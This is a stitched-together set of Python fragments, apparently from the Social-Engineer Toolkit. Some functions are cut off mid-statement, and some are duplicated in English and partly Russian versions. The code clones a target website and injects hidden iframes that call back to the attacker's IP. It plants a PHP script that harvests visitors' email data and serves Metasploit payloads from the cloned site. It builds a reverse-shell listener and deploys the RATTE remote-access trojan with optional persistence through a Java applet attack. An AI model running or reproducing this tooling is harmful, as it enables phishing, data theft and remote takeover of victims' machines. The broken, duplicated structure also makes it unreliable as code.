if match:
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line = line.replace(
"<head>",
'<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'
.format(ipaddr))
filewrite.write(line)
counter = 1
if web_port == 8080:
line = line.replace(
"<head>",
'<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'
.format(ipaddr))
filewrite.write(line)
counter = 1
if counter == 0:
filewrite.write(line)
if template == "CUSTOM" or template == "SELF":
# Bring our files to our directory
if attack_vector != 'hid' and attack_vector != 'hijacking':
print(core.bcolors.YELLOW +
"[*] Moving payload into cloned website." +
core.bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(os.path.join(core.setdir, applet_name)):
shutil.copyfile(
os.path.join(definepath,
"src/html/Signed_Update.jar.orig"),
os.path.join(core.setdir, applet_name))
shutil.copyfile(
os.path.join(core.setdir, applet_name),
os.path.join(core.setdir, "web_clone", applet_name))
if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
nix = core.check_options("NIX.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"),
os.path.join(core.setdir, "web_clone", nix))
if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
mac = core.check_options("MAC.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"),
os.path.join(core.setdir, "web_clone", mac))
if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
win = core.check_options("MSF.EXE=")
shutil.copyfile(os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "web_clone", win))
# pull random name generation
core.print_status(
"The site has been moved. SET Web Server is now listening..")
rand_gen = core.check_options("MSF_EXE=")
if rand_gen:
if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
shutil.copyfile(
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "web_clone/msf.exe"))
print(
"\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
)
shutil.copyfile(
os.path.join(core.setdir, "web_clone/msf.exe"),
os.path.join(core.setdir, "web_clone", rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
docbase = (
r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%%, 1%%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
</FRAMESET>
</HTML>""".format(ipaddr))
if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
os.remove(os.path.join(core.setdir, "web_clone/site.html"))
shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
os.path.join(core.setdir, "web_clone/site.html"))
with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
filewrite.write(docbase)
##########################################################################
#
# START WEB SERVER STUFF HERE
#
##########################################################################
if not apache:
if multiattack_harv == 'off':
try:
# specify port listener here
# specify the path for the SET web directories for the applet
# attack
path = os.path.join(core.setdir, "web_clone/")
try:
import src.core.webserver as webserver
p = multiprocessing.Process(target=webserver.start_server,
args=(web_port, path))
p.start()
except:
thread.start_new_thread(webserver.start_server,
(web_port, path))
# Handle KeyboardInterrupt
except KeyboardInterrupt:
core.exit_set()
# Handle Exceptions
except Exception as e:
core.log(e)
print(
"{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
"[!] There was an issue, printing error: {1}{2}".format(
core.bcolors.RED, e, core.bcolors.ENDC))
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop",
shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the
# applet attack
path = os.path.join(core.setdir + "web_clone")
p = multiprocessing.Process(
target=webserver.start_server,
args=(web_port, path))
p.start()
except:
print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".
format(core.bcolors.RED, core.bcolors.ENDC))
sys.exit()
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = core.check_options("CUSTOM_EXE=")
if custom_exe:
while True:
# try block inside of loop, if control-c detected, then
# exit
try:
core.print_warning(
"Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!"
)
input(
"\n{0}[*] Web Server is listening. Press Control-C to exit.{1}"
.format(core.bcolors.GREEN, core.bcolors.ENDC))
# handle keyboard interrupt
except KeyboardInterrupt:
print("{0}[*] Returning to main menu.{1}".format(
core.bcolors.GREEN, core.bcolors.ENDC))
break
if apache:
subprocess.Popen("cp {0} {apache_path};"
"cp {1} {apache_path};"
"cp {2} {apache_path};"
"cp {3} {apache_path};"
"cp {4} {apache_path}".format(
os.path.join(definepath, "src/html/*.bin"),
os.path.join(definepath, "src/html/*.html"),
os.path.join(core.setdir, "web_clone/*"),
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "*.jar"),
apache_path=apache_path),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).wait()
# if we are tracking users
if track_email == "on":
now = datetime.datetime.today()
with open(
os.path.join(apache_path, "harvester_{}.txt".format(now)),
'w') as filewrite:
filewrite.write("")
subprocess.Popen("chown www-data:www-data '{0}'".format(
os.path.join(apache_path, "harvester_{}.txt".format(now))),
shell=True).wait()
# here we specify if we are tracking users and such
with open(os.path.join(apache_path, "index.html")) as fileopen:
data = fileopen.read()
data = data.replace(
"<body>", "<body>"
"<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
"/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */"
.format(now))
with open(os.path.join(apache_path, "index.php"),
"w") as filewrite:
filewrite.write(data)
core.print_status(
"All files have been copied to {}".format(apache_path))
##########################################################################
#
# END WEB SERVER STUFF HERE
#
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path = core.meta_path()
if os.path.isfile("/etc/init.d/apache2"):
apache_stop = input(
"[!] Apache may be running, do you want SET to stop the process? [y/n]: "
)
if apache_stop.lower() == "y" or apache_stop.lower(
) == "yes":
core.print_status(
"Attempting to stop apache.. One moment..")
# stop apache here
subprocess.Popen("/etc/init.d/apache2 stop",
shell=True).wait()
try:
ipaddr.connect(('localhost', web_port))
if ipaddr:
core.print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config"
)
core.print_error(
"Exit whatever is listening and restart SET"
)
core.exit_set()
# if it couldn't connect to localhost, we are good to
# go and continue forward
except:
core.print_status(
"Success! Apache was stopped. Moving forward within SET..."
)
# if we don't want to stop apache then exit SET and flag
# user
if apache_stop.lower() == "n" or apache_stop.lower(
'-genkey '
'-alias MyCert '
'-keyalg RSA '
'-keysize 2048 '
'-dname "CN={a1},O={a2},C={a3},ST={a4},L={a5}"'.format(a1=answer1,
a2=answer2,
a3=answer3,
a4=answer4,
a5=answer5),
shell=True).wait()
core.print_info("Exporting the cert request to text file...")
# generate the request and export to certreq
subprocess.Popen("keytool -certreq -alias MyCert > {}".format(os.path.join(definepath, "certreq.txt")), shell=True).wait()
core.print_status("Export successful. Exported certificate under the SET root under certreq.txt")
core.print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
core.print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
core.print_info("When finished, enter the path to the .cer file below")
# cert_path is used for the certificate path when generating
cert_path = input(core.setprompt("0", "Path for the code signing certificate file (.spc file)"))
# if we can't find the filename
if not os.path.isfile(cert_path):
while True:
core.print_error("ERROR:Filename not found. Please try again.")
# re-prompt if file name doesn't exist
cert_path = input(core.setprompt("0", "Path to the .cer certificate file from Verisign"))
# if we detect file, then break out of loop
if os.path.isfile(cert_path):
break
# if we want to launch payload and automatically create listener
if trigger in [1, 2, 3]:
choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.setdir, "payload.options")) as fileopen:
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload {0}\n".format(line[0]))
filewrite.write("set lhost {0}\n".format(line[1]))
filewrite.write("set lport {0}\n".format(line[2]))
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
# create the listener
core.print_status(
"Launching Metasploit.. This could take a few. Be patient! Or else no shells for you.."
)
subprocess.Popen("{0} -r {1}".format(
os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "meta_config")),
shell=True).wait()
else:
core.print_warning("cancelling...")
sleep(2)
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(
core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nМожет быть, вы неправильно написали адрес?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Порт RATTE Server должен прослушивать [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Введите порт RATTE Сервер должен прослушивать [8080]")
))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(
core.setprompt(["9", "2"],
"Должен ли RATTE быть постоянным [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(
core.setprompt([
"9", "2"
], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?"
))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Полезная нагрузка была экспортирована в %s" %
os.path.join(core.userconfigpath, "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(
core.setprompt(["9", "2"],
"Запустите слушатель ratteserver сейчас [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Старт ратсервер...")
ratte_listener_start(ratteport)
core.print_info("Остановка ратсервера...")
sleep(2)
valid_response = True
else:
core.print_warning(
"действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
It works by reading natively off the SDCard into a buffer space thats then
written out through the keyboard.
""")
# if we hit here we are good since msfvenom is installed
print("""
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
enabled.\n""")
# grab the path and filename from user
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while True:
core.print_warning("Filename not found, try again")
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
# check the config file
fileopen = file("config/set_config", "r")
for line in fileopen:
line = line.rstrip()
# define if we use upx encoding or not
match = re.search("UPX_ENCODE=", line)
if match:
upx_encode = line.replace("UPX_ENCODE=", "")
# set the upx flag
match1 = re.search("UPX_PATH=", line)
if match1:
upx_path = line.replace("UPX_PATH=", "")
if upx_encode == "ON":
if not os.path.isfile(upx_path):
if operating_system != "windows":
setcore.print_warning("UPX packer not found in the pathname specified in config. Disabling UPX packing for executable")
upx_encode == "OFF"
# if we removed the set shells to free up space, needed for pwniexpress
match2= re.search("SET_INTERACTIVE_SHELL=", line)
if match2:
line = line.replace("SET_INTERACTIVE_SHELL=", "").lower()
if line == "off":
sys.exit("\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config")
# make directory if it's not there
if not os.path.isdir("src/program_junk/web_clone/"):
os.makedirs("src/program_junk/web_clone/")
# grab ip address and SET web server interface
if os.path.isfile("src/program_junk/interface"):
fileopen = file("src/program_junk/interface", "r")
def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter = 0
site_input_counter = 0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(
core.setprompt(["9", "2"],
"Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?" +
core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning(
"I can't determine the fqdn or IP of the site. Try again?"
)
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning(
"I couldn't determine whether this is an http or https site. Try again?"
)
site_input_counter += 1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(
core.setprompt(["9", "2"],
"Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
try:
ratteport = int(
raw_input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
raw_input(
core.setprompt(
["9", "2"],
"Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(
["9", "2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe = raw_input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" %
(definepath, definepath, ratte_random),
shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
def main():
valid_site = False
valid_ip = False
# valid_persistence = False
input_counter = 0
site_input_counter = 0
ipaddr = None
website = None
# pause=input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while not valid_site and site_input_counter < 3:
website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?")
sleep(4)
return
else:
core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?")
site_input_counter += 1
# core.DebugInfo("site.scheme is: %s " % site.scheme)
# core.DebugInfo("site.netloc is: %s " % site.netloc)
# core.DebugInfo("site.path is: %s " % site.path)
# core.DebugInfo("site.params are: %s " % site.params)
# core.DebugInfo("site.query is: %s " % site.query)
# core.DebugInfo("site.fragment is: %s " % site.fragment)
while not valid_ip and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?")
sleep(4)
return
else:
input_counter += 1
# javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
except ValueError:
# core.print_info("Port set to default of 80")
javaport = 80
try:
ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Порт не должен быть равен javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? "))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Запуск атаки Java-апплета..")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Стартовый ратсервер...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return